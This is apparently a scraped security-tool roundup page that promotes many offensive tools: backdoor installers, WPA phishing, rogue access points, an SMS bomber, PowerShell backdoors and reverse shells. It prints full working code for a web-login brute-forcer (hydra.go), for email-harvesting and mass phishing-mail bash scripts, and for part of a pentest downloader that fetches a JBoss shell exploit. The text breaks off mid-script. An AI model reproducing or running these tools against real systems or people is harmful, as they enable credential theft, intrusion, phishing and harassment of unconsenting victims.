Hashcat graphic User Interface(GUI) minimal for windows x86 and x64.
Features:
+ Graphic environment friendly.
+ .CAP Converter * a * .HCCAP.
+ Support for 32 and 64bit.
+ Power regulator.
+ Customizable dictionaries.
+ Attacks recovery paused or canceled.
hashcat gui minimal for windows x86/x64.
Download : HashCatGUI-Release.rar (3.5 MB)
Source : http://sourceforge.net/projects/hashcat-gui-minimal
Latest Change 23/12/2015:
+ fixed travis version.
+ added poison module.
+ Fixed Bash and added a second bash backdoor.
+ removed offending tests.
Backdoorme is a simple utility that logs into a Linux machine and gives the user the option to install a slew of backdoors.
BackdoorMe a powerful auto-backdooring utility. This Backdoor has Been Tested on Kali Linux 2.0 and Ubuntu 14.04
Currently enabled backdoors include:
+ Bash
+ Netcat
+ Netcat-traditional
+ Metasploit
+ Perl
+ Pupy
– Python :Please run the dependencies python script to install the necessary dependencies. Backdoorme requires python2.7 or higher.
Instalation:
git clone https://github.com/Kkevsterrr/backdoorme <Your Clone Folder Name> cd <your Folder> python dependencies.py python master.py Update: cd backdoorme git pull
Source: https://github.com/Kkevsterrr | Our post Before
Latest change 24/12/2015:
+ Introducing phishingpage module.
+ wifiphisher.py : Fix bug where online template would not download.
+ phishingpage.py : Created the logoSnatcher.sh file and correctly inserted ascii art.
Wifiphisher is a security tool that mounts fast automated phishing attacks against WPA networks in order to obtain the secret passphrase. It is a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining WPA credentials.
Fast automated phishing attacks against WPA networks
From the victim’s perspective, the attack makes use in three phases:
– Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point’s wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.
– Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point’s settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.
– Victim is being served a realistic router config-looking page. wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for WPA password confirmation due to a router firmware upgrade.
Requirements :
– Kali Linux.
– Two network interfaces, one wireless.
– A wireless card capable of injection.
USAGE :
git clone https://github.com/sophron/wifiphisher cd wifiphisher python wifiphisher.py -h (for helper) update: cd wifiphisher git pull
Download: Zipball | or clone url
Source : https://github.com/sophron/wifiphisher | Our Post before
Changelog v-0.73:
+ Authentication Basic Digest Negotiate NTLM and Kerberos.
+ Database type selection.
+ Remove Cookie (use Header instead).
+ Fix MySQL error based.
— Fix #1368
— Fix #223
— Fix #218
— Fix #138
— Fix #135
— Fix #133
jSQL Injection is a lightweight application used to find database information from a distant server.
jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).
jSQL Injection is a lightweight application used to find database information from a distant server.
Kali Linux logo jSQL is part of Kali Linux, the official new BackTrack penetration distribution.
jSQL is also included in Black Hat Sec, ArchAssault Project and BlackArch Linux.
Disclaimer :
Attacking web-server is illegal without prior mutual consent. The end user is responsible and obeys all applicable laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
Download : jsql-injection-alpha.v0.73.jar(2.82 MB)
Source : https://github.com/ron190
Our Post Before : http://seclist.us/jsql-injection-v-0-72-released-a-java-tool-for-automatic-database-injection.html
Hydra is a penetration testing tool exclusively focused on dictionary-attacking web-based login forms.
latest change : Add retry queue.
Installation:
+ go get github.com/opennota/hydra
Usage: hydra -L logins.txt -P passwords.txt http://127.0.0.1/login “user=^USER^&pass=^PASS^” “login failed”
hydra.go script:
// This program is free software: you can redistribute it and/or modify it
// under the terms of the GNU General Public License as published by the Free
// Software Foundation, either version 3 of the License, or (at your option)
// any later version.
//
// This program is distributed in the hope that it will be useful, but
// WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
// Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program. If not, see <http://www.gnu.org/licenses/>.
// Penetration testing tool.
package main
import (
"bufio"
"bytes"
"errors"
"flag"
"fmt"
"io"
"io/ioutil"
"log"
"net/http"
"net/http/cookiejar"
"net/url"
"os"
"os/signal"
"runtime"
"strconv"
"strings"
"sync"
"syscall"
)
const (
defaultUserAgent = "Mozilla/5.0 (Hydra)"
defaultContentType = "application/x-www-form-urlencoded"
)
var (
loginsStr = flag.String("l", "", "A login or logins separated by colons")
loginsFrom = flag.String("L", "", "Load logins from FILE")
passwordsStr = flag.String("p", "", "A password or passwords separated by colons")
passwordsFrom = flag.String("P", "", "Load passwords from FILE")
colonSeparatedFrom = flag.String("C", "", `Load lines in the colon separated "login:pass" format from FILE`)
firstOnly = flag.Bool("f", false, "Exit when a login/password pair is found")
invertedCondition = flag.Bool("i", false, "A fulfilled condition means an attempt was successful")
numTasks = flag.Int("t", 16, "A number of tasks to run in parallel")
verbose = flag.Bool("v", false, "Be verbose (show the response from the HTTP server)")
showAttempts = flag.Bool("V", false, "Show login+password for each attempt")
outputTo = flag.String("o", "", "Write found login/password pairs to FILE instead of stdout")
headersAdd Headers
headersReplace Headers
retryQueueLength = flag.Int("r", 1024, "Length of the retry queue")
postURL string
host string
data string
condition []byte
jobs chan Job
retry chan Job
wg sync.WaitGroup
m sync.Mutex
out io.WriteCloser = os.Stdout
proxyURL *url.URL
)
type Header struct {
key string
value string
}
type Headers []Header
func (hs *Headers) Set(val string) error {
if !strings.Contains(val, ":") {
return errors.New("invalid header: " + val)
}
kv := strings.SplitN(val, ":", 2)
h := Header{
key: kv[0],
value: strings.TrimLeft(kv[1], " "),
}
*hs = append(*hs, h)
return nil
}
func (hs *Headers) String() string {
s := make([]string, 0, len(*hs))
for _, h := range *hs {
s = append(s, fmt.Sprintf("%s: %s", h.key, h.value))
}
return strings.Join(s, "\n")
}
type Job struct {
user string
pass string
}
func readlines(fn string) (lines []string) {
f, err := os.Open(fn)
if err != nil {
log.Fatal(err)
}
defer f.Close()
scanner := bufio.NewScanner(f)
for scanner.Scan() {
lines = append(lines, scanner.Text())
}
if err := scanner.Err(); err != nil {
log.Fatal(err)
}
return
}
func safeExit() {
m.Lock()
err := out.Close()
m.Unlock()
if err != nil {
log.Print(err)
}
os.Exit(0)
}
func worker(n int) {
defer wg.Done()
client := http.Client{}
if proxyURL != nil {
client.Transport = &http.Transport{
Proxy: http.ProxyURL(proxyURL),
}
}
var job Job
ok := true
loop:
for {
if ok {
select {
case job, ok = <-jobs:
if !ok {
continue loop
}
case job = <-retry:
default:
break loop
}
} else {
select {
case job = <-retry:
default:
break loop
}
}
if *showAttempts {
fmt.Fprintf(os.Stderr, "[ATTEMPT] target %s - login %q - pass %q [worker %d]\n", host, job.user, job.pass, n)
}
postData := strings.Replace(data, "^USER^", url.QueryEscape(job.user), -1)
postData = strings.Replace(postData, "^PASS^", url.QueryEscape(job.pass), -1)
req, _ := http.NewRequest("POST", postURL, strings.NewReader(postData))
req.Header.Add("Host", host)
req.Header.Add("User-Agent", defaultUserAgent)
req.Header.Add("Content-Length", strconv.Itoa(len(postData)))
req.Header.Add("Content-Type", defaultContentType)
req.Header.Add("Connection", "Keep-Alive")
for _, h := range headersAdd {
req.Header.Add(h.key, h.value)
}
for _, h := range headersReplace {
req.Header.Set(h.key, h.value)
}
client.Jar, _ = cookiejar.New(nil)
resp, err := client.Do(req)
if err != nil {
log.Print(err)
select {
case retry <- job:
default:
}
continue
}
if *verbose {
resp.Header.Write(os.Stderr)
os.Stderr.Write([]byte{'\n'})
}
body, err := ioutil.ReadAll(resp.Body)
resp.Body.Close()
if err != nil {
log.Print(err)
select {
case retry <- job:
default:
}
continue
}
if *verbose {
os.Stderr.Write(body)
}
failed := bytes.Contains(body, condition)
if *invertedCondition {
failed = !failed
}
if failed {
continue
}
m.Lock()
_, err = fmt.Fprintf(out, "%s:%s\n", job.user, job.pass)
m.Unlock()
if err != nil {
log.Print(err)
}
if *firstOnly {
safeExit()
}
}
}
func main() {
runtime.GOMAXPROCS(runtime.NumCPU())
log.SetFlags(log.Lshortfile)
flag.Usage = func() {
fmt.Fprintf(os.Stderr, `Usage: hydra [options] URL post-data condition
Options:
-l login A login or logins separated by colons
-L FILE Load logins from FILE
-p pass A password or passwords separated by colons
-P FILE Load passwords from FILE
-C FILE Load lines in the colon separated "login:pass" format from FILE
-h header Add an HTTP header
-H header Replace an HTTP header
-i A fulfilled condition means an attempt was successful
-f Exit when a login/password pair is found
-t TASKS A number of tasks to run in parallel (default: 16)
-o FILE Write found login/password pairs to FILE instead of stdout
-v Be verbose (show the response from the HTTP server)
-V Show login+password for each attempt
-r Length of the retry queue (default: 1024)
Use HYDRA_PROXY environment variable for proxy setup.
`)
}
flag.Var(&headersAdd, "h", "Add an HTTP header")
flag.Var(&headersReplace, "H", "Replace an HTTP header")
flag.Parse()
if len(flag.Args()) != 3 {
flag.Usage()
os.Exit(1)
}
if *loginsStr != "" && *loginsFrom != "" {
log.Fatal("both -l and -L are specified")
}
if *passwordsStr != "" && *passwordsFrom != "" {
log.Fatal("both -p and -P are specified")
}
if *colonSeparatedFrom != "" &&
(*loginsStr != "" ||
*loginsFrom != "" ||
*passwordsStr != "" ||
*passwordsFrom != "") {
log.Fatal("both -C and one of -l/-L/-p/-P are specified")
}
if *colonSeparatedFrom == "" {
if *loginsStr == "" && *loginsFrom == "" {
log.Fatal("no logins are specified")
}
if *passwordsStr == "" && *passwordsFrom == "" {
log.Fatal("no passwords are specified")
}
}
postURL = flag.Arg(0)
parsed, err := url.Parse(postURL)
if err != nil {
log.Fatal("invalid URL: " + err.Error())
}
host = parsed.Host
data = flag.Arg(1)
condition = []byte(flag.Arg(2))
proxy := os.Getenv("HYDRA_PROXY")
if proxy != "" {
proxyURL, err = url.Parse(proxy)
if err != nil {
log.Fatal("invalid proxy URL: " + err.Error())
}
}
retry = make(chan Job, *retryQueueLength)
jobs = make(chan Job, *numTasks)
wg.Add(*numTasks)
for i := 0; i < *numTasks; i++ {
go worker(i)
}
if *outputTo != "" {
out, err = os.OpenFile(*outputTo, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0600)
if err != nil {
log.Fatal(err)
}
defer out.Close()
sig := make(chan os.Signal)
signal.Notify(sig, os.Interrupt)
signal.Notify(sig, syscall.SIGTERM)
go func() {
<-sig
safeExit()
}()
}
if *colonSeparatedFrom != "" {
f, err := os.Open(*colonSeparatedFrom)
if err != nil {
log.Fatal(err)
}
defer f.Close()
scanner := bufio.NewScanner(f)
for scanner.Scan() {
lp := strings.SplitN(scanner.Text(), ":", 2)
if len(lp) < 2 {
continue
}
jobs <- Job{lp[0], lp[1]}
}
if err := scanner.Err(); err != nil {
log.Fatal(err)
}
} else {
var logins, passwords []string
if *loginsFrom != "" {
logins = readlines(*loginsFrom)
} else {
logins = strings.Split(*loginsStr, ":")
}
if *passwordsFrom != "" {
passwords = readlines(*passwordsFrom)
} else {
passwords = strings.Split(*passwordsStr, ":")
}
for _, pass := range passwords {
for _, user := range logins {
jobs <- Job{user, pass}
}
}
}
close(jobs)
wg.Wait()
}Source : https://github.com/opennota
Eharvester is simple script which extracts email address from the given domain for penetration testing process.
Script works on two modes:
+ In first mode you have to specify sitemap of website ,it is fast.Just visit this URL http://www.xml-sitemaps.com/ & make sitemap of victim website ;download text file of urllist.txt & put it in same directory of script.Now it crawl one by one url from urllist.txt & collect email address.
+ Second mode is automatic ; just supply domain name ; it make sitemap & then gather email address.But it is slow .
email-sender
With help of esender you can send social engineering emails to all address which are gathered from eharveter.
Usage of script :
git clone https://github.com/MacAwesome/ehs-supermaster chmod +x harvester.sh chmod +x esender.sh ./harvester.sh ./esender.sh
esender.sh script:
#!/usr/bin/env bash
echo "
_____ _
| ____| ___ ___ _ __ __| | ___ _ __
| _| _____ / __|/ _ \ _ \ / _ |/ _ \ __|
| |___ |_____| \__ \ __/ | | | (_| | __/ |
|_____| |___/\___|_| |_|\__,_|\___|_|
"
echo "
Enter your email Address"
read address
echo "
Enter your password"
read -s passsword
echo "
Enter Subject"
read subject
echo "
Enter message. If you want tot send HTML message enter HTML code start with <html>"
read msg
cat output.txt | while read f1
echo "Messages are sending"
do
sendEmail -f $address -t $f1 -u "$subject" -m "$msg" -s smtp.gmail.com:587 -xu "$address" -xp "$passsword"
rm f1
doneharvester.sh script:
#!/usr/bin/env bash
#E-Harvester is simple script to harvest email address for penetration testing.
#Script is working in two mode
#In first mode you have to create sitemap manually. You can use (http://www.xml-sitemaps.com/) to create sitemap.
#and put sitemap text file in working directory of E-HARVESTING.Give name it to urllist.txt
#Second mode is automatic just specify domain name & it will first crawl website ;then harvest email address ;But it`s slow due to crawling process.
echo "
_____ _ _ _ ______ _______ ____ _____ _____ ____
| ____| | | | | / \ | _ \ \ / / ____/ ___|_ _| ____| _ \
| _| _____ | |_| | / _ \ | |_) \ \ / /| _| \___ \ | | | _| | |_) |
| |___ |_____| | _ |/ ___ \| _ < \ V / | |___ ___) || | | |___| _ <
|_____| |_| |_/_/ \_\_| \_\ \_/ |_____|____/ |_| |_____|_| \_\
"
echo "Please choose method"
echo "
1. If you have sitemap of website than make name urllist.txt & Put in same directory(work Fast)
2. Generate sitemap than harvest email(Automatic but slow)
"
read m1
if [ "$m1" = "1" ];then
echo "
Script is workng,Please be Patient & give some time to harvest it.
"
cat urllist.txt | while read f1
do
w3m $f1 >> f1
perl -wne'while(/[\w\.]+@[\w\.]+/g){print "$&\n"}' f1 | sort -u >> output.txt
rm f1
done
cat output.txt
echo "
Harvesting is complete.Open output.txt file to view email address.
"
fi
if [ "$m1" = "2" ];then
echo "
Please Enter Website To Harvest Email Address
For example http://tipstrickshack.blogspot.com
"
read choice
echo "
Now we have to make urllist of website.So be Patient & give some time to harvest it.
"
wget --spider --recursive --no-verbose --output-file=wgetlog.txt "$choice"
sed -n "s@.\+ URL:\([^ ]\+\) .\+@\1@p" wgetlog.txt | sed "s@&@\&@" > urllist.txt
rm wgetlog.txt
cat urllist.txt | while read f1
do
w3m $f1 >> f1
perl -wne'while(/[\w\.]+@[\w\.]+/g){print "$&\n"}' f1 | sort -u >> output.txt
rm f1
done
cat output.txt
echo "
Harvesting is complete. Open output.txt file to view email address.
"
echo "
Use E-sender to send email to harvested email Address
"
fiSource: https://github.com/MacAwesome
Arpy is an easy-to-use ARP spoofing MiTM tool for Mac. It provides 3 targeted functions:
+ Packet Sniffing
+ Visited Domains
+ Visited Domains with Gource
arpy v3.15
Tested OS (to date):
+ Darwin 14.3.0 Darwin Kernel Version 14.3.0 (Mac OS X)
+ Kali 2.0, fedora & Ubuntu tls 14.04
Requirements:
– Python 2.7
– Gource
– Scapy
usage :
git clone https://github.com/ivanvza/arpy cd arpy sudo apt-get install gource (kali, Debian & Ubuntu) yum install gource (for fedora) pip install scapy ./arpy.py
source : https://github.com/ivanvza
Changelog v0.71:
+ added update commits from repository
+ added QTableWidget filter (mac,ip,hostname) clients connected on AP.
+ added count of clients connected no AP.
+ changed name Tool Wifi-Pumpkin
+ locked dnsmasq support temporarily
wifipumpkin-v-0-7-1
WiFi-Pumpkin is security tool that provide the Rogue access point to Man-In-The-Middle and network attacks. purporting to provide wireless Internet services, but snooping on the traffic. can be used to capture of credentials of unsuspecting users by either snooping the communication by phishing.
Features
+ Rouge Wi-Fi Access Point
+ Deauth Clients AP
+ Probe Request Monitor
+ DHCP Starvation Attack
+ Crendentials Monitor
+ Windows Update Attack
+ Templates phishing
+ Partial bypass HSTS
+ Dump credentials phishing
+ Support airodump scan
+ Support mkd3 deauth
+ beef hook support
+ Report Logs html
+ Mac Changer
+ ARP Posion
+ DNS Spoof
Ubuntu/Kali 2.0/WifiSlax 4.11.1/Parrot 2.0.5:
git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git cd WiFi-Pumpkin chmod +x installer.sh ./installer.sh --install then wifipumpkin (ubuntu) wifi-pumpkin (kali 2.0)
Source : https://github.com/P0cL4bs
Disrupt is a penetration tool devised purely disruption purposes.
Modules:
* SMS Bomber: The SMS Bomber module allows users to send an overflow of threads to victims phones. The threads are sent from Googles smtplib module. It is recommended to send a thread size of 10-15 for faster delivery. A sending thread package can be any size. Also, in order to overflow a user, the victim needs to have an Iphone. It works with android, but they can block the sender.
* DoS Attack: Currently in Beta..
Disrupt – is a penetration tool devised purely disruption purposes.
usage:
git clone https://github.com/ozylol/disrupt cd disrupt python disrupt.py
Source : https://github.com/ozylol
Latest change v1.6-179-g6050c1c:
+ add some extra sanity checks inside the child process”) made trinity near unusable for me: the rec->tv sanity check fails rather quickly after first syscall capable of changing wall time.
+ The patch reworks trinity to use clock_gettime(CLOCK_MONOTONIC) instead of gettimeofday(). It makes trinity usable again.
#######################################################################
WARNINGS:
* This program may seriously corrupt your files, including any of those that may be writable on mounted network file shares. It may create network packets that may cause disruption on your local network.
* Trinity may generate the right selection of syscalls to start sending random network packets to other hosts. While every effort is made to restrict this to IP addresses on local lans, multicast & broadcast, care should be taken to not allow the packets it generates to go out onto the internet.
Run at your own risk.
#######################################################################
Trinity-v-1-6-179-g6050c1c
Trinity: Linux system call fuzzer.
System call fuzzers aren’t a particularly new idea. As far back as 1991, people have written apps that bomb syscall inputs with garbage data, that have had a variety of success in crashing assorted operating systems. After fixing the obvious dumb bugs however, a majority of the time these calls will just by rejected by the kernel very near the beginning of their function entry point as basic parameter validation is performed. Trinity is a system call fuzzer which employs some techniques to pass semi-intelligent arguments to the syscalls being called.
The intelligence features include:
– If a system call expects a certain datatype as an argument (for example a file descriptor) it gets passed one.
This is the reason for the slow initial startup, as it generates a list of fd’s of files it can read from /sys, /proc and /dev
and then supplements this with fd’s for various network protocol sockets. (Information on which protocols succeed/fail is cached on the first run, greatly increasing the speed of subsequent runs).
– If a system call only accepts certain values as an argument, (for example a ‘flags’ field), trinity has a list of all the valid flags that may be passed.
Just to throw a spanner in the works, occasionally, it will bitflip one of the flags, just to make things more interesting.
– If a system call only takes a range of values, the random value
passed is biased to usually fit within that range.
Trinity logs it’s output to a files (1 for each child process), and fsync’s the files before it actually makes the system call. This way, should you trigger something which panics the kernel, you should be able to find out exactly what happened by examining the log.
There are several test harnesses provided (test-*.sh), which run trinity in various modes and takes care of things like cpu affinity, and makes sure it runs from the tmp directory. (Handy for cleaning up any garbage named files; just rm -rf tmp afterwards)
Usage:
git clone https://github.com/kernelslacker/trinity cd trinity ./configure.sh make ./trinity -h (for helper)
Source: https://github.com/kernelslacker
sidedoor is a Backdoor using a reverse SSH tunnel on Debian/Ubuntu systems.
sidedoor maintains a reverse SSH tunnel to provide a backdoor. sidedoor can be used to remotely control a device behind a NAT. The sidedoor user has full root access configured in /etc/sudoers.d.
Howto:
1. Install sidedoor. For now, sudo dpkg -i sidedoor*.deb. You3. can build a package by running dpkg-buildpackage -us -uc -b.
2. Optionally, lock down the local SSH server by disabling password authentication (ChallengeResponseAuthentication no and PasswordAuthentication no) and listening only on localhost (ListenAddress ::1 and ListenAddress 127.0.0.1) in /etc/ssh/sshd_config. Then restart or reload sshd, e.g., sudo service ssh reload.
3. Configure REMOTE_SERVER and TUNNEL_PORT in /etc/default/sidedoor.
4. Install an SSH private key to access the remote server in /var/lib/sidedoor/.ssh/id_rsa. The corresponding public key will need to be included in the remote user’s ~/.ssh/authorized_keys file.
5. Install SSH public key(s) to control access to the local sidedoor user in /var/lib/sidedoor/.ssh/authorized_keys.
6. Restart sidedoor service, e.g., sudo service sidedoor restart.
7. Optionally, modify ssh_config_example and include it in a client’s ~/.ssh/config file to easily access the tunnelled backdoor.
Usage:
git clone https://github.com/daradib/sidedoor cd sidedoor ./sidedoor
Source: https://github.com/daradib
Changelog v0.6.2:
+ Added support for dumping cleartext credentials from RDP sessions for Invoke-MimikatzWfigestDowngrade.
– fix issues #29.
DESCRIPTION
This script uses MJPEG to stream a target’s desktop in real time. It is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port.
A netcat listener which relays connection to a local port could be used as listener. A browser which supports MJPEG (Firefox) should then be pointed to the local port to see the remote desktop.
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.
Nishang v-0.6.2 released: PowerShell for penetration testing and offensive security.
Scripts; Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak :Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell
+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.
+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.
+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.
+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.
+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster FireListener: A pair of scripts for egress testing
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys: Get WLAN keys in plain text from a target.
+ Keylogger
Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade: Dump user passwords in plain on Windows 8.1 and Server 2012
– Get-PassHints : Get password hints of Windows users from a target.
+ Pivot
– reate-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay Create network relays between computers.
+ Prasadhak
– Prasadhak : Check running hashes of running process against the VirusTotal database.
+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner
+ Powerpreter
Powerpreter : All the functionality of nishang in a single script module.
+ Shells :
– Invoke-PsGcat: Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.
+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence: Remote persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]
Download : Nishang.zip(951 KB) | Our Post Before
Source : http://www.labofapenetrationtester.com/
whats new in 2016:
+ header changes.
+ Perl version
+ Script path
+ OS/Platform Version Print
+ and more usability..
ATSCAN is a perl script with function Dork scanner. XSS scanner. LFI scanner. Filter wordpress and Joomla sites in the server. Find Admin page. Decode / Encode MD5 + Base64.
Principal MENU:
1 = DORK SCANNER
2 = SITE SCANNER
3 = SERVER SCANNER
4 = MD5 / BASE 64
5 = ABOUT
6 = EXIT (->)
SCAN SITES OPTIONS:
[+] 1 = CHECK HTTPD VERSION
[+] 2 = XSS SCAN
[+] 3 = LFI SCAN
[+] 4 = RFI SCAN (JOOMLA)
[+] 5 = RFI SCAN (WORDPRESS)
[+] 6 = XSS + LFI
[+] 7 = FIND ADMIN PAGE
[+] 8 = BACK (<-)
[+] 9 = EXIT (->)
How to Usage:
git clone https://github.com/AlisamTechnology/ATSCAN cd ATSCAN perl atscan.pl Update: cd ATSCAN git pull
Source : https://github.com/AlisamTechnology | Our Post Before
Breach-Miner is A quick and dirty python based tool to harvest credentials from a leaked data dump.
Just a handy tool for pentesters to recon their victims in scope. Using this tool one can identify the victims email account has been leaked during any breaches. The tool uses Troy Hunts haveibeenpwned api to search for accounts in breach dumps.
BreachMiner
Latest Change 1/1/2016:
+ Files/Resources : Create style.css
+ Update breachminer.py
+ Update cache_search.py
+ Update create_html.py
+ Update get_cache.js
Usage:
git clone https://github.com/secworld/Breach-Miner.git && cd Breach-Miner chmod +x breachminer.py requirements.sh ./requirements.sh python breachminer.py Update: cd Breach-Miner git pull
Source : https://github.com/secworld
zizzania sniffs wireless traffic listening for WPA handshakes and dumping only those frames suitable to be decrypted (one beacon + EAPOL frames + data). In order to speed up the process, zizzania sends IEEE 802.11 DeAuth frames to the stations whose handshake is needed, properly handling retransmissions and reassociations and trying to limit the number of DeAuth frames sent to each station.
Automated DeAuth attack
Dependencies:
+ SCons http://www.scons.org/
+ libpcap http://www.tcpdump.org/
+ uthash https://troydhanson.github.io/uthash/
Usage & Installation:
git clone https://github.com/cyrus-and/zizzania cd zizzania For Debian/Kali 2.0 sudo apt-get install scons libpcap-dev uthash-dev Mac OSX brew install scons libpcap clib clib install troydhanson/uthash # from this directory make cd src ./zizzania
Source : https://github.com/cyrus-and
Penbox ~ Pentesting tools auto downloader Script.
Requirements : python2.7
penbox v1.0 Has been tested on Debian and Ubuntu 14.04 TLS
Operating System Support Menu:
1) Max OSX
2) Linux
3) Windows
Main Menu:
1 : Information Gathering
2 : Password Attacks
3 : Wireless Testing
4 : Exploitation Tools
5 : Sniffing & Spoofing
penbox.py Script:
#!/usr/bin/env python2.7
#
# All In One Tool For Penetration Testing
# Authors : Fedy Wesleti , Mohamed Nour
#
import sys
import os
import subprocess
from commands import *
##########################
#Variables
yes = set(['yes','y', 'ye', ''])
no = set(['no','n'])
##########################
#this is the big menu funtion
def menu():
print """
######## ######## ## ## ######## ####### ## ##
## ## ## ### ## ## ## ## ## ## ##
## ## ## #### ## ## ## ## ## ## ##
######## ###### ## ## ## ######## ## ## ###
## ## ## #### ## ## ## ## ## ##
## ## ## ### ## ## ## ## ## ##
## ######## ## ## ######## ####### ## ## v1.0
Pentesting Tools Auto-Downloader
[+] Coded BY Mohamed Nour & Fedy Weslety [+]
[+] FB/CEH.TN ~~ FB/mohamed.zeus.0 [+]
[+] Greetz To All Pentesters [+]
Select from the menu:
1 : Information Gathering
2 : Password Attacks
3 : Wireless Testing
4 : Exploitation Tools
5 : Sniffing & Spoofing
99 : Exit
"""
choice = input("selet a number :")
choice = int(choice)
if choice == 1:
info()
elif choice == 2:
passwd()
elif choice == 3:
wire()
elif choice == 4:
exp()
elif choice == 5:
snif()
elif choice == 99:
os.system('clear'),sys.exit();
#end of function
##########################
#nmap function
def nmap():
print("this step will download and install nmap ")
print("yes or no ")
choice7 = raw_input()
if choice7 in yes :
os.system("wget https://nmap.org/dist/nmap-7.01.tar.bz2")
os.system("bzip2 -cd nmap-7.01.tar.bz2 | tar xvf -")
os.system("cd nmap-7.01")
os.system("./configure")
os.system("make")
os.system("su root")
os.system("make install")
elif choice7 in no :
info()
####################################
#jboss-autopwn
def jboss():
os.system('clear')
print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once")
print ("deployed, the script uses its upload and command execution capability to")
print ("provide an interactive session.")
print ("")
print (" this will install jboss-autopwn")
print ("usage : ./e.sh target_ip tcp_port ")
choice9 = raw_input("yes / no :")
if choice9 in yes:
os.system("git clone https://github.com/SpiderLabs/jboss-autopwn.git"),sys.exit();
elif choice9 in no:
os.system('clear'); exp()
#sqlmap
def sqlmap():
print (" this will install sqlmap ")
print ("usage : python sqlmap.py -h")
choice8 = input("yes or no :")
if choice8 in yes:
os.system("git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev")
elif choice8 in no:
os.system('clear'); info()
#setoolkit
def setoolkit():
print ("The Social-Engineer Toolkit is an open-source penetration testing framework")
print(") designed for social engineering. SET has a number of custom attack vectors that ")
print(" allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC ")
print("an information security consulting firm located in Cleveland, Ohio.")
print("")
choiceset = raw_input("y / n :")
if choiceset in yes:
os.system("git clone https://github.com/trustedsec/social-engineer-toolkit.git");os.system("cd social-engineer-toolkit");os.system("python setup.py")
if choiceset in no:
os.system("clear"); info()
#cupp
def cupp():
